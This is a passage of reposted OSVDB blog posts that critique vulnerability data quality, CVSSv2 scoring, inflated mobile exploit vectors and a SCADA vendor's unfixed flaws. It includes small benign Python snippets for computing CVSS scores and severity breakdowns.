This is true. But more ways to manipulate bad data still leave you with bad data. In addition to CVE missing several thousand vulnerabilities a year, their push for quantity in the last few years has led to a serious hit on quality. There are some CVE IDs with descriptions missing critical information like the vendor, affected version, or impact. All the data wrangling and fancy analysis of that data is still based on bad or incomplete information. All the lipstick on that pig still leaves it a pig.

Finally, I will quote one other line from their blog that is curious:

Hacking open-source software also has a bigger payoff because many more people use it.

I understand and appreciate the sentiment, and finding a vulnerability in a library like OpenSSL obviously has a huge impact. However, that and a couple dozen other libraries are still the outliers in the bigger picture. Compare a vulnerability like EternalBlue to a standard open source library vulnerability and they are not even close as far as how “many more people use it”.

The problem with SCADA goes deeper…

[This was originally published on the OSVDB blog.]

We know SCADA is virtual Swiss cheese, ready to be owned if someone can reach a device. We have preached airgaps for decades, even before we knew how bad the software was. Back then it was just, “this is so critical, it has to be separate!”

The last five years have proven how bad it is, with the rise of SCADA vulnerability disclosures. Sure, we can overlook the bad coding, proprietary protocols, no evidence of an SDLC, and the incredible amount of time it can take to patch. For some silly reason we put up with “forever-day bugs” because something is so critical it can’t be rebooted (forgetting how absurd that design choice is). But what if we go a step beyond that?

ICS-CERT advisory 14-084-01, released yesterday on vulnerabilities in Festo products, is a good reminder of just how bad the problem is, and how much deeper it goes. First, the product has a backdoor in the FTP service allowing unauthenticated access (CVSSv2 9.3). This can allow a remote attacker to crash the device or execute arbitrary code. Second, the device is vulnerable due to bundling the 3S CoDeSys Runtime Toolkit, which does not require authentication for admin functions (CVSSv2 10.0), and has a traversal flaw that allows file manipulation leading to code execution (CVSSv2 10.0). Those two issues were reported in January of 2013, making this report, as it relates to Festo products, over a year late.

So we have a vendor backdoor, unauthenticated administrator access, and a way to bypass authentication if it was there to gain privileges. So realistically, what type of organizations does this potentially impact? From the ICS-CERT advisory:

This product is used industrywide as a programmable logic controller with inclusion of a multiaxis controller for automated assembly and automated manufacturing. Identified customers are in solar cell manufacturing, automobile assembly, general assembly and parts control, and airframe manufacturing where tolerances are particularly critical to end product operations.

Now to dig the hole deeper. Under the “Mitigation” section, we see how serious Festo considers these vulnerabilities. Paraphrased from two lines in the advisory:

Festo has decided not to resolve these vulnerabilities, placing critical infrastructure asset owners using this product at risk … because of compatibility reasons with existing engineering tools.

The two 3S CoDeSys vulnerabilities have a fix available and just need to be integrated into the Festo products. What does “compatibility with existing engineering tools” really mean in the context of software? The ICS-CERT advisory also says:

According to the Festo product web page, other products are using newer versions of CoDeSys software and may not be vulnerable to the CoDeSys vulnerability, but this has not been evaluated by the researcher.

The researcher already spent time finding the issues, reporting them to a coordinating body, and following coordinated disclosure practices. Expecting them to also evaluate which products are not vulnerable is ridiculous. This is a case of the vendor just being lazy and irresponsible.

Here we have a company that makes vulnerable critical components that affect our infrastructure and directly impact our safety, yet refuses to fix them. Why is this allowed to exist in our society?


Mobile Devices and Exploit Vector Absurdity

[This was originally published on the OSVDB blog.]

The last few days have seen several vulnerabilities disclosed that include serious gaps in logic with regard to exploitation vectors. What is being called “remote” is not. What is being called “critical” is not. Here are a few examples to highlight the problem. We beg of you, please be rational when explaining vulnerabilities and exploit chaining. The biggest culprit in all of this is the “need for a user to install a malicious app” to then allow a vulnerability to be exploited. Think about it.

Number One

We start with an H-Online article titled “Critical vulnerability in Blackberry 10 OS”. First word: critical. In the world of vulnerabilities, critical means a CVSSv2 score of 10.0, which essentially allows for remote code execution without user interaction. Consider that standard and widely accepted designation, and read the article’s summary of what is required to exploit this vulnerability:

As well as needing Protect enabled, the user must still install a malicious app, which then compromises a Protect-component so that it can intercept a password reset. This password reset requires the user, or someone who knows the BlackBerry ID and password, to go to the web site of BlackBerry Protect and request the password. If the attacker manages that, then the Protect component, compromised by the earlier malicious app, can let the attacker know the new password for the device. If he has physical access to the device, he can now log on successfully as the actual user. Otherwise, the attacker can only access Wi-Fi file sharing if the actual user has activated it.

The only thing missing from this exploit chain are the proverbial chicken sacrifices at midnight on a full blue moon. Want to get the same result much easier? Find your victim and say “Wow, that is a slick new phone, can I see it?” Nine out of ten times, they unlock the phone and hand it to you. Less work, same result.

Number Two

There were a few disclosures out of Japan’s JVN system, run by JPCERT. Two examples, both the same fundamental vulnerability, are summarized below:

#1 – CVE-2013-3643 (NVD Entry) – JVN 99813183 / JVNDB-2013-000056
#2 – CVE-2013-3642 (NVD Entry) – JVN 79301570 / JVNDB-2013-000055

#1 – The Galapagos Browser application for Android does not properly implement the WebView class, which allows attackers to obtain sensitive information via a crafted application.

Despite all these references, users are left with either incorrect or very misleading information. First, CVE says “an attacker” instead of qualifying it as a local attacker. I only call them out because they are historically more precise than this. Second, NVD calls this a “context-dependent” attacker via the CVSSv2 score (AV:N/AC:M/Au:N/C:P/I:N/A:N), saying it can be exploited over the network with moderate user interaction. NVD also says this affects confidentiality ‘partially’. JVN goes so far as to say it can be exploited “over the Internet using packets” with “anonymous or no authentication”.
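Given the CVSSv2 vector NVD assigned here, it is worth seeing what actually drives the score. Below is a small base score calculator, a sketch I wrote using the metric weights from the FIRST CVSSv2 specification (not any official library), applied to that vector:

```python
# CVSSv2 base score from a vector string, using the metric weights
# defined in the FIRST CVSSv2 specification.

AV = {"L": 0.395, "A": 0.646, "N": 1.0}    # Access Vector
AC = {"H": 0.35, "M": 0.61, "L": 0.71}     # Access Complexity
AU = {"M": 0.45, "S": 0.56, "N": 0.704}    # Authentication
CIA = {"N": 0.0, "P": 0.275, "C": 0.66}    # C/I/A impact

def cvss2_base(vector: str) -> float:
    m = dict(part.split(":") for part in vector.split("/"))
    impact = 10.41 * (1 - (1 - CIA[m["C"]]) * (1 - CIA[m["I"]]) * (1 - CIA[m["A"]]))
    exploitability = 20 * AV[m["AV"]] * AC[m["AC"]] * AU[m["Au"]]
    f_impact = 0.0 if impact == 0 else 1.176
    return round(((0.6 * impact) + (0.4 * exploitability) - 1.5) * f_impact, 1)

print(cvss2_base("AV:N/AC:M/Au:N/C:P/I:N/A:N"))  # 4.3
```

Note that the “AV:N” term alone contributes the maximum exploitability weight, which is exactly the scoring decision being disputed: change it to “AV:L” and the score drops considerably.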

The Reality

The reality of these vulnerabilities is that they are not remote. Not in any form under any circumstances that the vulnerability world accepts. For some reason, VDBs are starting to blur the lines of exploit traits when it comes to mobile devices. The thought process seems to be that if the user installs a malicious application, then the subsequent local vulnerability becomes ‘remote’. This is absurd. Just because that may be the most probable exploit vector and chaining, does not change the fact that getting a user to install a malicious application is a separate distinct vulnerability that cannot have any scoring weight or impact applied to the vulnerability in question. If you can get a phone user to install a malicious application, you can do a lot more than steal ‘partial’ information from the one vulnerable application.

Let me put it to you in terms that are easier to understand. If you have a Windows local privilege escalation vulnerability, it is local. Using the above logic, if I say that by tricking a user into installing a malicious application it can then be exploited remotely, what would you say? If you have a Linux kernel local DoS, it too can become remote or context-dependent if the root user installs a malicious application. You can already spin almost any of these local vulnerabilities into remote by saying “remote, authentication required” and assuming it can be done via RDP or SSH. Doing so, though, devalues the entire purpose of vulnerability classification.

Any doubts? Consider that CVE treats the exact same situation as the mobile browser vulnerabilities above as a local issue in Windows, even when a “crafted application” is required (see IDs below). The only difference is if the local user writes the application (Windows), or gets the user to install the application (Mobile). Either way, that is a local issue.


CVSSv2 Shortcomings, Faults, and Failures Formulation

[This was originally published on the OSVDB blog.]

The Open Security Foundation (OSF) and Risk Based Security wrote an open letter to FIRST regarding the upcoming Common Vulnerability Scoring System (CVSS) version 3 proposal. While we were not formally asked to provide input, given our expertise in managing vulnerability databases, along with our daily use of CVSS, we felt the feedback would provide valuable insight to improve CVSS in the future.

Some of the areas discussed include:

  • Introducing 4 levels for granularity
  • Better definitions of terminology for more accurate scoring
  • Re-examining the pitfalls of “Access Complexity”
  • Limitations of the current Access Vector breakdown
  • The challenge of scoring authentication
  • And a variety of other considerations to improve vulnerability scoring

Our conclusion points to the need for CVSS to be overhauled as CVSSv2 has too many current shortcomings to provide an adequate and useful risk scoring model. You can download the full letter in PDF format.

Advisories != Vulnerabilities, and How It Affects Statistics

[This was originally published on the OSVDB blog.]

I’ve written about the various problems with generating vulnerability statistics in the past. There are countless factors that contribute to, or skew, vulnerability stats. This is an ongoing problem for many reasons. First, important numbers are thrown around in the media and taken as gospel, creating varying degrees of bias in administrators and owners. Second, these stats are rarely explained to show how they were derived. In short, no one shows their work, their potential bias, caveats, or other issues that should be included as a responsible security professional. A recent article has highlighted this problem again. To better show why vulnerability stats are messy, but important, I will show you how it is trivial to skew numbers simply by using different criteria, along with several pitfalls that must be factored into any set of stats you generate. The fun part is that the words used to describe the differences can be equally nebulous, and they are all valid, if properly disclaimed!

I noticed a Tweet from SC Magazine about an article titled “The ghosts of Microsoft: Patch, present and future”. The article is by Alex Horan, security strategist at CORE Security, and discusses Microsoft’s vulnerabilities this year. Reading down, the first line of the second paragraph immediately struck me as being incorrect.

Based on my count, there were 83 vulnerabilities announced by Microsoft over the past year. This averages out to a little more than six per month, a reasonable number of patches (and reboots) to apply to your systems over the course of a year.

It is difficult to tell if Horan means “vulnerabilities” or “patches”, as he appears to use the same word to mean both, when they are quite different. The use of ’83’ makes it very clear, Horan is referencing Microsoft advisories, not vulnerabilities. This is an important distinction as a single advisory can contain multiple vulnerabilities.

A cursory look at the data in OSVDB showed there were closer to 170 vulnerabilities verified by Microsoft in 2012. A search that includes references for “MS12” (used in their advisory designations) returns 160 results. This made it easy to determine that either the number Horan used was inaccurate, or his wording was. If you generate statistics based on advisories versus independent vulnerabilities, results will vary greatly. To add a third perspective, we must also consider the total number of disclosed vulnerabilities in Microsoft products. This means ones that did not correspond to a Microsoft advisory (e.g., perhaps a KB only), did not receive a CVE designation, or were missed completely by the company. On Twitter, Space Rogue (@spacerog) asked about severity breakdowns over the last few years. Since that would take considerable time to generate, I am going to stay focused on 2012 as it demonstrates the issues. Hopefully this will give him a few numbers though!

If we look at the 2012 Microsoft advisories versus 2012 Microsoft CVE versus 2012 Microsoft total vulnerabilities, and do a percentage breakdown by severity, you can see heavy bias. We will use the following breakdown of CVSS scores to determine severity: 9 – 10 = critical, 7 – 8.9 = important, 4 – 6.9 = moderate, 0 – 3.9 = low.

Base Source          | Critical    | Important  | Moderate   | Low
2012 Advisories (83) | 35 (42.2%)  | 46 (55.4%) | 2 (2.4%)   | 0 (0.0%)
2012 CVE (160)       | 100 (62.5%) | 18 (11.3%) | 39 (24.4%) | 3 (1.8%)
2012 Total (176)     | 101 (57.4%) | 19 (10.8%) | 41 (23.3%) | 15 (8.5%)
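The severity bands and percentage math above can be sketched in a few lines of code (my own sketch, not OSVDB tooling; note that Python’s round() uses round-half-even, so a value landing exactly on a .x5 boundary may differ by 0.1 from the table):

```python
# Bucket CVSS base scores into the severity bands defined above, then
# compute a percentage breakdown across severities.

def severity(score: float) -> str:
    if score >= 9.0:
        return "critical"
    if score >= 7.0:
        return "important"
    if score >= 4.0:
        return "moderate"
    return "low"

def breakdown(counts: dict) -> dict:
    """Percentage of the total for each severity, to one decimal place."""
    total = sum(counts.values())
    return {sev: round(100 * n / total, 1) for sev, n in counts.items()}

# The 2012 Microsoft CVE row from the table above (160 vulnerabilities):
print(breakdown({"critical": 100, "important": 18, "moderate": 39, "low": 3}))
```

Run against a different base set of the “same” vulnerabilities (advisories versus CVEs versus total), the identical code produces very different distributions, which is the point of this exercise.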

It isn’t easy to see the big shifts in totals in a table, but it is important to establish the numbers involved when displaying any type of chart or visual representation. If we look at those three breakdowns using simple pie charts, the shifts become much more apparent:

The visual jump in critical vulnerabilities from the first chart to the second two is distinct. In addition, notice the jump from the first two charts to the third with regard to the low severity vulnerabilities, which didn’t even make an appearance on the first chart. This is a simple example of how the “same” vulnerabilities can be represented differently, based on terminology and the source of data. If you want to get pedantic, there are additional considerations that must be factored into these vulnerabilities.

In no particular order, these are other points that should not only be considered, but disclaimed in any presentation of the data above. While it may seem minor, at least one of these points could further skew vulnerability counts and severity distribution.

  • MS12-080 only contains 1 CVE if you look at the immediate identifiers, but also contains 2 more CVEs in the fine print related to Oracle Outside In, which is used by the products listed in the advisory.
  • MS12-058 actually has no immediate CVEs! If you read the fine print, it actually covers 13 vulnerabilities. Again, these are vulnerabilities in Oracle Outside In, which is used in some Microsoft products.
  • Of the 176 Microsoft vulnerabilities in 2012, as tracked by OSVDB, 10 do not have CVE identifiers assigned.
  • OSVDB 83750 may or may not be a vulnerability, as it is based on a Microsoft KB with uncertain wording. Vague vulnerability disclosures can skew statistics.
  • Most of these CVSS scores are taken from the National Vulnerability Database (NVD). NVD outsources CVSS score generation to junior analysts from a large consulting firm. Just as we occasionally have mistakes in our CVSS scores, so does NVD. Overall, the number of scores that have serious errors are low, but they can still introduce a level of error into statistics.
  • One of the vulnerabilities (OSVDB 88774 / CVE-2012-4792) has no formal Microsoft advisory, because it is a 0-day that was just discovered two days ago. There will almost certainly be a formal Microsoft advisory in January 2013 that covers it. This highlights a big problem with using vendor advisories for any statistic generation. Vendors generally release advisories when their investigation of the issue has completed, and a formal solution is made available. Generating statistics or graphics off the same vulnerabilities, but using disclosure versus solution date will give two different results.

These are just a few ways that statistics can be manipulated, often by accident, and why presenting as much data and explanation as possible is beneficial to everyone. I certainly hope that SC Magazine and/or CORE will issue a small correction or explanation as to what the “83” number really represents.

OSVDB – Search Filters & Custom Exports

[This was originally published on the OSVDB blog.]

Last week, OSVDB enhanced its search results by adding considerable filtering capability, a simple “results by year” graph, and export options. Rather than draft a huge walkthrough, open a search in a new tab and do a title search for “microsoft windows”.

As always, the results will display showing the OSVDB ID, disclosure date, and OSVDB title. On the left, however, are several new options. First, a summary graph will be displayed showing the number of vulnerabilities by year, based on your search results. Next, you can toggle the displayed fields to add CVE, CVSSv2 score, and/or the percent complete. The percent complete refers to the status of the OSVDB entry, and how many of its fields have been completed. Below that are one-click filters that let you further refine your search results by the following criteria:

  • Reference Type – only show results that contain a given type of reference
  • Category – show results based on the vulnerability category
  • Disclosure Year – refine results by limiting to a specific year
  • CVSS Score – only show entries that are scored in a given range
  • Percent Complete – filter results based on how complete the OSVDB entry is

Once you have your ideal search results, you can then export them as XML, a custom RSS feed, or CSV. The export will only work for the first 100 results. If you need a bigger data set to work with, we encourage you to download the database instead.
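As a quick illustration of what you can do with a CSV export once you have it, here is a sketch that filters exported rows by CVSS score. The IDs, titles, and column names below are placeholders I made up for the example, not the actual export format:

```python
import csv
import io

# A hypothetical CSV export -- the column names and rows here are
# illustrative placeholders, not the real OSVDB export schema.
export = """osvdb_id,disclosure_date,title,cvss_score
1001,2012-07-10,Example Entry One,7.5
1002,2012-12-27,Example Entry Two,9.3
"""

rows = list(csv.DictReader(io.StringIO(export)))

# Keep only entries scored 9.0 or higher.
high = [r for r in rows if float(r["cvss_score"]) >= 9.0]
print([r["osvdb_id"] for r in high])  # ['1002']
```

The same pattern feeds easily into spreadsheets, dashboards, or whatever downstream tooling your organization already uses.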

With the new search capability, you should be able to perform very detailed searches, easily manipulate the results and even import them into another application or presentation. If you have other ideas of how a VDB search can be refined to provide more flexibility and power, contact us!

OSVDB – Search Enhance: by CVSS Score or Attribute

[This was originally published on the OSVDB blog.]

Using the ‘Advanced Search’ page, you can now search the database by entering a CVSSv2 score range (e.g., 8 to 10) or by a specific CVSSv2 attribute (e.g., Confidentiality: Partial). To search for entries with only a 10 score, use the search range 10 to 10.

Using this search mechanism, we can see there are 3,217 entries in the database with a score of 10 and 9,266 entries that involve a complete loss of availability.
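Conceptually, the two new filters reduce to a range test and an attribute match. This sketch (with made-up entries, purely for illustration of the filter logic) shows both:

```python
# Illustrative entries -- not real database records.
entries = [
    {"id": 1, "score": 10.0, "availability": "Complete"},
    {"id": 2, "score": 8.5,  "availability": "None"},
    {"id": 3, "score": 4.3,  "availability": "Partial"},
]

def by_score_range(items, low, high):
    """Entries whose CVSSv2 score falls in [low, high], inclusive."""
    return [e for e in items if low <= e["score"] <= high]

def by_attribute(items, attr, value):
    """Entries whose CVSSv2 attribute matches a specific value."""
    return [e for e in items if e[attr] == value]

print([e["id"] for e in by_score_range(entries, 8, 10)])  # [1, 2]
print([e["id"] for e in by_attribute(entries, "availability", "Complete")])  # [1]
```

Making the range inclusive on both ends is what allows the “10 to 10” trick mentioned above to return only perfect-10 entries.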

We hope this flexibility allows for even more refined searches to better help your project or organization. Stay tuned, this is one of many new search features planned.